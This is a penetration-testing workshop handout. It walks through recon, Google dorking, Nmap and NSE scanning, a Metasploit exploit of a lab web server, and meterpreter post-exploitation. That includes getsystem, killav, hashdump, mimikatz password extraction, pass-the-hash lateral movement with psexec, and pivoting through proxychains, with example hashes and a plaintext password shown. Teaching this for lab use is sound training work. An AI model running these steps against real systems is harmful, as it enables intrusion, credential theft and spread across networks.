################################
# Pentester Night School 2016 #
# By Joe McCray #
################################


##########
# VMWare #
##########
- For this workshop you'll need the latest version of VMware Workstation (Windows), Fusion (Mac), or Player.

- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.


##########################
# Download the attack VM #
##########################

VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec

(The same password is the sudo password. Wherever a command below is followed by a line reading "strategicsec", that is the sudo password being typed, not a separate command.)

---------------------------------------------------------------------------------------------------------------------------------



################################
# Tactical Pentest Methodology #
################################

The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan: a fixed sequence of steps, with the tool or site to use at each one.



-=-=-=-=-=- Phase 1 -=-=-=-=-=-


##########################################
# Step 1: External Target Identification #
##########################################
Find all of the IP ranges owned by your target company via the following websites (both are passive: you query a third party's database and never touch the target):
- https://www.robtex.com/
- http://toolbar.netcraft.com/site_report

Look for weak SSL/TLS configurations (old protocol versions, weak ciphers, certificate problems):
- https://www.ssllabs.com/ssltest/
  Note that SSL Labs connects to the target from Qualys' servers, so this is not a purely passive check; it just does not come from your IP.



#############################
# Step 2: Google Quick Hits #
#############################

Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.
https://www.exploit-db.com/google-hacking-database/

Really good google dorks to use:
site:yourtarget.com filetype:pcf     (Cisco VPN client profiles: they carry the VPN gateway, group name and an obfuscated group password)
site:yourtarget.com filetype:ica     (Citrix ICA connection files: they reveal Citrix server addresses and published application names)

1. Footholds:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=

Be sure to prefix each dork from the category above with 'site:yourtarget.com' so the results are limited to the target.


2. Passwords:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=

Be sure to prefix each dork from the category above with 'site:yourtarget.com'.


3. Sensitive Directories:
-------------------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=

Be sure to prefix each dork from the category above with 'site:yourtarget.com'.




Make sure that you do at least 50-100 different Google dorks, and no fewer than 10 dorks per category.



###########################
# Step 3: Compromise Data #
###########################
Look to see if they have already been breached.

Search for the target company (and their major competitors) in the Data Breach Database:
http://www.privacyrights.org/data-breach

Put targetcompany.com in the search box of the link below to look for known defacements of their sites (zone-h is a defacement archive, so a hit means the site was compromised at some point):
http://zone-h.com/search

Replace targetcompany.com with your target domain name to look for publicly reported XSS vulnerabilities in the site:
http://xssed.com/search?key=targetcompany.com



##############################
# Step 4: Build OSINT Report #
##############################

Passive Recon
-------------
Install this add-on and enumerate as much info as possible (it is a legacy Firefox add-on, so check that it still installs on your Firefox version):
- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/


Next we build an OSINT report from the data gleaned in the previous steps. Here is a sample report:
https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc

Look through it to get an idea not only of what is involved in doing passive recon, but also of what the actual output of the work should look like.

---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 2 -=-=-=-=-=-
##########################
# Download the attack VM #
##########################

VM for these labs: the same StrategicsecUbuntu-v3.zip download and strategicsec/strategicsec credentials as in the "Download the attack VM" section above.


############################################
# Identifying External Security Mechanisms #
############################################

Flush the VM's own firewall rules first, so that nothing local interferes with the scans below:

sudo /sbin/iptables -F
(sudo password: strategicsec)

cd /home/strategicsec/toolz



###########################
# Target IP Determination #
###########################
cd /home/strategicsec/toolz
perl blindcrawl.pl -d targetcompany.com

-- Take each IP address it returns and look it up here (the whois record tells you who owns the netblock, which often reveals further ranges):
http://www.networksolutions.com/whois/index.jsp

cd ~/toolz/fierce2
fierce -dns targetcompany.com               (DNS enumeration: zone transfer attempt, hostname brute force, lookups of the neighbouring IPs)
cd ..



cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254           (reverse DNS lookup of every IP in the range; 148.87.1.0/24 is just the example range used in class)


sudo nmap -sL 148.87.1.0-255                (list scan: reverse DNS for each IP, no packets are sent to the hosts themselves, and sudo is not actually needed for it)
(sudo password: strategicsec)

sudo nmap -sL 148.87.1.0-255 | grep oracle  (the example range is Oracle's, hence the grep; grep for whatever name you expect to see in your target's PTR records)
(sudo password: strategicsec)


sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
(sudo password: strategicsec)
(pulls the certificate from every TLS service it finds; the commonName and Subject Alternative Names frequently reveal hostnames and domains that DNS did not)

Reference:
http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html



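The ssl-cert step above yields one certificate per TLS service, and the useful part is the names inside them. As an added example (not from the handout; it assumes the normal Nmap text output format shown in SAMPLE_SCAN, which is constructed sample output rather than a real scan of the range), this Python script collects the commonName and the DNS entries of the Subject Alternative Name per host, then reduces them to the domains the target appears to own:

```python
"""Harvest hostnames from `nmap --script=ssl-cert` output.

Added example, not part of the original handout.  It parses the normal
(stdout / -oN) Nmap output offline: for every host it collects the
commonName and every DNS: entry from the Subject Alternative Name, so the
certificates found on a bare IP range turn into a hostname/domain list.
SAMPLE_SCAN is constructed sample output, not a real scan.
"""
import re
from collections import defaultdict

SAMPLE_SCAN = """\
Nmap scan report for 148.87.1.10
PORT    STATE SERVICE
443/tcp open  https
| ssl-cert: Subject: commonName=www.targetcompany.com/organizationName=Target Company Inc/countryName=US
| Subject Alternative Name: DNS:www.targetcompany.com, DNS:targetcompany.com, DNS:mail.targetcompany.com
| Issuer: commonName=Example CA/organizationName=Example CA Ltd
| Not valid before: 2016-01-01T00:00:00
|_Not valid after:  2017-01-01T00:00:00

Nmap scan report for 148.87.1.22
PORT     STATE SERVICE
8443/tcp open  https-alt
| ssl-cert: Subject: commonName=vpn.targetcompany.com
| Issuer: commonName=vpn.targetcompany.com
|_Not valid after:  2018-06-01T00:00:00
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
# Only the Subject line, not the Issuer line, names the target's own host.
SUBJECT_RE = re.compile(r"^\| ssl-cert: Subject: commonName=([^/\n]+)", re.M)
SAN_RE = re.compile(r"^\| Subject Alternative Name: (.+)$", re.M)


def harvest_names(scan_text):
    """Return {ip: sorted list of names} for every host block in the scan."""
    names = defaultdict(set)
    # One block per host; each block starts with "Nmap scan report for".
    blocks = re.split(r"(?=^Nmap scan report for )", scan_text, flags=re.M)
    for block in blocks:
        host = HOST_RE.search(block)
        if not host:
            continue
        ip = host.group(1)
        for m in SUBJECT_RE.finditer(block):
            names[ip].add(m.group(1).strip())
        for m in SAN_RE.finditer(block):
            # SAN entries look like "DNS:a.example.com, DNS:b.example.com, IP Address:1.2.3.4"
            for entry in m.group(1).split(","):
                entry = entry.strip()
                if entry.startswith("DNS:"):
                    names[ip].add(entry[4:].strip())
    return {ip: sorted(v) for ip, v in names.items()}


def registrable_domains(names_by_ip):
    """Collapse the harvested names to their last two labels: a rough
    'which domains do they own' view that feeds back into Step 1."""
    domains = set()
    for names in names_by_ip.values():
        for n in names:
            labels = n.lstrip("*.").split(".")
            if len(labels) >= 2:
                domains.add(".".join(labels[-2:]))
    return sorted(domains)


if __name__ == "__main__":
    found = harvest_names(SAMPLE_SCAN)
    for ip, ns in found.items():
        print(ip, ", ".join(ns))
    print("domains:", ", ".join(registrable_domains(found)))
```

Run the real scan with -oN and feed the file to harvest_names; names that resolve outside the range you scanned are new targets for the whois step.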
###########################
# Load Balancer Detection #
###########################
Here are some command-line options to use for identifying load balancers:

dig targetcompany.com                       (several A records for one name, or a very short TTL, hints at DNS-based load balancing; dig google.com shows what that looks like)

cd ~/toolz
./lbd-0.1.sh targetcompany.com              (lbd checks for DNS and HTTP load balancing by comparing repeated responses)


halberd targetcompany.com                   (halberd sends many requests and clusters the replies by headers, dates and cookies to count the real servers behind one name)



######################################
# Web Application Firewall Detection #
######################################

cd ~/toolz/wafw00f
python wafw00f.py http://www.targetcompany.com

cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse targetcompany.com
(sudo password: strategicsec)

Both tools send deliberately malicious-looking requests and watch for the changed responses a WAF produces, so expect them to show up in the target's logs.


---------------------------------------------------------------------------------------------------------------------------------

-=-=-=-=-=- Phase 3 -=-=-=-=-=-
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf

sudo nmap -sP 10.0.0.0/24                   (ping sweep; -sP is the old spelling of -sn on current Nmap)

sudo nmap -sL 10.0.0.0/24                   (reverse DNS of the lab range, no probes sent)

cd ~/toolz

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod +x ipcrawl

./ipcrawl 10.0.0.1 10.0.0.254



wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c

gcc propecia.c -o propecia                  (the -o is required; "gcc propecia.c propecia" fails)

sudo cp propecia /bin

propecia 10.0.0 22                          (fast connect() sweep of one port across a /24; note that it takes the three-octet prefix)

propecia 10.0.0 3389

Now a version scan in grepable output (-oG -) so the result can be piped. On the "Ports:" line of -oG output the IP is field 2, the reverse-DNS name (in parentheses) is field 3, and each port appears as port/state/proto//service//version/, so matching on "open" keeps only hosts with at least one open port:

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

(-T 5 is the most aggressive timing template: fine in the lab, but on a real engagement it loses results and trips IDS. Each host's ports are on a single line, so the wc -l count is the number of hosts with an open port.)

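The awk pipelines above depend on field positions in Nmap's grepable output. The following Python script is an added example, not part of the handout: it parses that format properly, offline, on the constructed SAMPLE_OG text (the hosts, ports and version strings in it are made up for the demo), and reproduces the labnet-ip-list.txt host list plus a per-port service/version table while ignoring closed and filtered ports:

```python
"""Parse Nmap grepable (-oG) output into (host, port, proto, service, version) records.

Added example, not part of the original handout.  It does offline what the
awk one-liners do with `print $2` / `print $3`, without their pitfalls: a
host with several open ports is listed once, and closed or filtered ports
are ignored.  SAMPLE_OG is constructed sample output, not a real scan.
"""
import re

SAMPLE_OG = """\
# Nmap 7.01 scan initiated Tue Mar  1 20:00:00 2016 as: nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.*
Host: 10.0.0.15 ()\tStatus: Up
Host: 10.0.0.15 ()\tPorts: 80/open/tcp//http//Savant httpd 3.1/, 443/closed/tcp//https///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Service/\tIgnored State: filtered (3)
Host: 10.0.0.20 (web01.lab)\tStatus: Up
Host: 10.0.0.20 (web01.lab)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, 80/open/tcp//http//Apache httpd 2.0.58 ((Win32))/\tIgnored State: closed (4)
Host: 10.0.0.31 ()\tStatus: Up
Host: 10.0.0.31 ()\tPorts: 21/filtered/tcp//ftp///, 22/filtered/tcp//ssh///\tIgnored State: closed (4)
# Nmap done at Tue Mar  1 20:01:00 2016 -- 256 IP addresses (3 hosts up) scanned in 60.00 seconds
"""

# "Host: <ip> (<rdns>)<TAB>Ports: <entries>[<TAB>Ignored State: ...]"
HOST_LINE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*?)(?:\t|$)", re.M)


def parse_grepable(text):
    """Return one dict per *open* port.  Each port entry has the form
    port/state/proto/owner/service/rpcinfo/version/ and entries are ', '-separated."""
    records = []
    for m in HOST_LINE.finditer(text):
        ip, hostname, ports = m.group(1), m.group(2), m.group(3)
        for entry in ports.split(", "):
            fields = entry.split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            records.append({
                "ip": ip,
                "hostname": hostname,
                "port": int(fields[0]),
                "proto": fields[2],
                "service": fields[4],
                "version": fields[6],
            })
    return records


def open_hosts(text):
    """Unique IPs with at least one open port, in scan order (what ~/labnet-ip-list.txt holds)."""
    seen = []
    for r in parse_grepable(text):
        if r["ip"] not in seen:
            seen.append(r["ip"])
    return seen


def hosts_with_service(text, name):
    """(ip, port) pairs whose detected service name starts with `name`, e.g. 'http'."""
    return [(r["ip"], r["port"]) for r in parse_grepable(text) if r["service"].startswith(name)]


if __name__ == "__main__":
    for r in parse_grepable(SAMPLE_OG):
        print("%(ip)s:%(port)d/%(proto)s %(service)s %(version)s" % r)
    print("hosts:", open_hosts(SAMPLE_OG))
    print("web servers:", hosts_with_service(SAMPLE_OG, "http"))
```

The version column is what you search exploit-db for later, so keeping it next to the host and port saves re-scanning.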
cd ~/toolz
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
(Google Code is gone; if this URL no longer resolves, fetch a wkhtmltoimage build from the project's current release page and keep the remaining steps the same)
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
sudo cp wkhtmltoimage-i386 /usr/local/bin/

git clone https://github.com/SpiderLabs/Nmap-Tools.git     (GitHub no longer serves the git:// protocol, so clone over https)
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb

cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot -iL /home/strategicsec/labnet-ip-list.txt
(the targets come from -iL, so there is no need to also pass 10.0.0.0/24; the PNGs are written to the current directory as screenshot-nmap-<ip>:<port>.png)




vi screenshots.sh

#!/bin/bash
# Gallery of the http-screenshot PNGs (named screenshot-nmap-<ip>:<port>.png); the ':' is URL-encoded as %3A in the IMG SRC
out=labnet-port-80-screenshots.html
printf '<HTML><BODY><BR>\n' > "$out"
for png in *.png; do
    printf '%s\n<BR><IMG SRC="%s" width=400><BR><BR>\n' "$png" "${png//:/%3A}" >> "$out"
done
printf '</BODY></HTML>\n' >> "$out"





bash screenshots.sh                         (bash, not sh: the ${var//:/%3A} substitution is a bash feature; open the resulting HTML file in a browser)




##########################
# Nmap NSE tricks to try #
##########################
(all of these are active checks against every host in the /24: -Pn skips host discovery, -n skips reverse DNS, --open reports only hosts where the port is open)

sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
(ms-sql-dump-hashes only returns anything once it has credentials with the right DB privileges, e.g. an empty sa password found by ms-sql-empty-password)

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute,oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
(one --script list rather than two separate --script options, so there is no question of one overriding the other; orausers.txt is your own wordlist of Oracle usernames and must exist in the current directory)

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24




####################################
# Finally, let's exploit something #
####################################

nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'      (which lab hosts run a web server)

nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15                                      (full version detection on the one we pick)

https://www.exploit-db.com/search

Search for the exact product and version strings that -sV reported:
Savant httpd 3.1
Apache httpd 2.0.58 ((Win32))


Found one written in Python:
https://www.exploit-db.com/exploits/18401/

Found one for Savant 3.1 from Metasploit:
https://www.exploit-db.com/exploits/16770/



cd ~/toolz/metasploit
./msfconsole
use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit

(bind_nonx_tcp is a bind payload: it opens port 7777 on the target and msf connects to it, so LPORT here is a port on the victim, and it only works if nothing between you and the target filters that port. The "nonx" stager is meant for targets that do not enforce NX/DEP; if the exploit runs but no session comes back, try windows/meterpreter/bind_tcp or a reverse_tcp payload with LHOST set to your VPN address.)





********************************** Figure out who and where you are **********************************

meterpreter> sysinfo                        (OS, architecture, hostname, domain)


meterpreter> getuid                         (the user the exploited process runs as)


meterpreter> ipconfig                       (all interfaces: a second NIC means a second network to pivot into)


meterpreter> run post/windows/gather/checkvm


meterpreter> run get_local_subnets          (old meterpreter script; on current Metasploit, run post/multi/manage/autoroute both lists the local subnets and adds routes for them)



********************************** Escalate privileges and get hashes **********************************


meterpreter> use priv                       (on current Metasploit the priv extension, which provides getsystem, is loaded automatically, so this step can be skipped)



meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav                     (old script that kills known AV processes; noisy, and deprecated on current versions)

meterpreter> run post/windows/gather/hashdump

Got the following admin hash (pwdump format, user:RID:LM hash:NT hash:::):
Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::

meterpreter> run post/windows/gather/credentials/credential_collector

meterpreter > load mimikatz                 (on current Metasploit the mimikatz extension has been replaced by kiwi: load kiwi, then creds_kerberos or creds_all)

meterpreter > kerberos

This should give me the administrative password (mimikatz reads it out of LSASS memory, which is why getsystem had to come first):
)K5?Jocb(Yx


********************************** Enumerate the host you are on **********************************

meterpreter> run winenum                    (old catch-all enumeration script; the post modules below are its replacement)

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run      (programs started at logon: look for AV, management agents, and anything you could hijack for persistence)


********************************** Get out of Meterpreter **********************************

meterpreter> background                     (keeps the session alive and returns you to the module prompt)

msf exploit(savant_31_overflow) > back

msf>




********************************** Lateral Movement *******************************


Now we can run the PSEXEC exploit. It needs admin credentials for the target (plaintext or hash) and SMB (445) reachable: it copies a service binary to ADMIN$ and starts it as a service, which works on any host where those credentials are valid, so re-run it against the other 10.0.0.x hosts with 445 open once you have found them.

-- Option 1: plaintext password
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass )K5?Jocb(Yx

set RHOST 10.0.0.15

set payload windows/meterpreter/bind_tcp

set LPORT 2345                              (bind payload again: port 2345 is opened on the target)

exploit

********************************** Get out of Meterpreter **********************************

meterpreter> background

msf exploit(psexec) > back

msf>

**********************************
-- Option 2: pass the hash (no plaintext needed; SMBPass takes the LM:NT pair exactly as hashdump printed it)
use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363

set payload windows/meterpreter/bind_tcp

set RHOST 10.0.0.15

set LPORT 5678

exploit

(This works because NTLM authentication only ever proves knowledge of the NT hash, never of the password itself, so the dumped hash is as good as the password on every machine where this Administrator account has the same password.)


********************************** Set up your Pivot **********************************

meterpreter > background
<-- background the session
You want to get back to this prompt:
msf exploit(handler) > back <--- you need to get to the main msf> prompt



sessions -l <-- find a session you want to pivot through (note the IP and session number)

Now set up Pivot with a route add
---------------------------------

route print <--- should be blank

route add 10.0.0.0 255.255.255.0 1 <-- network address, netmask, session id: use the id shown by sessions -l (it may be 2, 3 or 4 rather than 1). Make sure you are on the msf> prompt, not meterpreter.


route print <----- verify new route

From now on anything msf sends to 10.0.0.0/24 goes through the compromised host's network stack. In this lab that subnet is the one you are already on, so the route is for practice; on a real engagement you add the subnet(s) from the compromised host's ipconfig that you cannot reach directly, and every network you later scan through the socks proxy needs a route here too (e.g. route add 192.168.153.0 255.255.255.0 <session> for the 192.168.153.0/24 scan further down).

******************************Scan through your Pivot ******************************

use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot

set THREADS 10

set RHOSTS 10.0.0.0/24 <-- Keep changing this range and re-running the scan until you find something you want to attack

set PORTS 445

run


####################################
# Socks Tunneling with Proxychains #
####################################
--- Open a duplicate putty session to your Ubuntu host (a plain shell, alongside the one running msfconsole)

sudo apt-get install -y proxychains
(sudo password: strategicsec)
(on newer Ubuntu releases the package is proxychains4 and the config file is /etc/proxychains4.conf; the edit is the same)

sudo vi /etc/proxychains.conf <--- Make sure that the last line of the file is: socks4 127.0.0.1 1080

Comment out the proxy_dns line, change the 9050 (Tor port) in the final socks4 line to the Metasploit socks proxy port (1080), and save it. proxy_dns is disabled because we scan by IP and do not want name lookups forced through the tunnel as well.
socks4 127.0.0.1 1080

***************************Set up a Socks Proxy through your Pivot *************************

--- In the msfconsole session (at the msf> prompt):

use auxiliary/server/socks4a        (on current Metasploit this is auxiliary/server/socks_proxy with set VERSION 4a)

set SRVHOST 127.0.0.1

set SRVPORT 1080

run

The proxy listens on the attack VM only (SRVHOST 127.0.0.1) and hands each connection to the msf routing table, so anything covered by a route from the pivot section above goes out through the meterpreter session.

--- Go back to the duplicate putty session (the plain shell, not msfconsole):
cd ~

proxychains nmap -sT -Pn -n -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow

proxychains nmap -sT -Pn -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0.0/24 <--- This is going to be really slow

(Only full TCP connect scans work through a socks proxy, so -sT must be given explicitly: as root Nmap defaults to a SYN scan, whose raw packets bypass the proxy. -Pn and -n are needed for the same reason, since ICMP/ARP pings and DNS lookups would not go through the tunnel either.)


---close the duplicate putty session to your Ubuntu host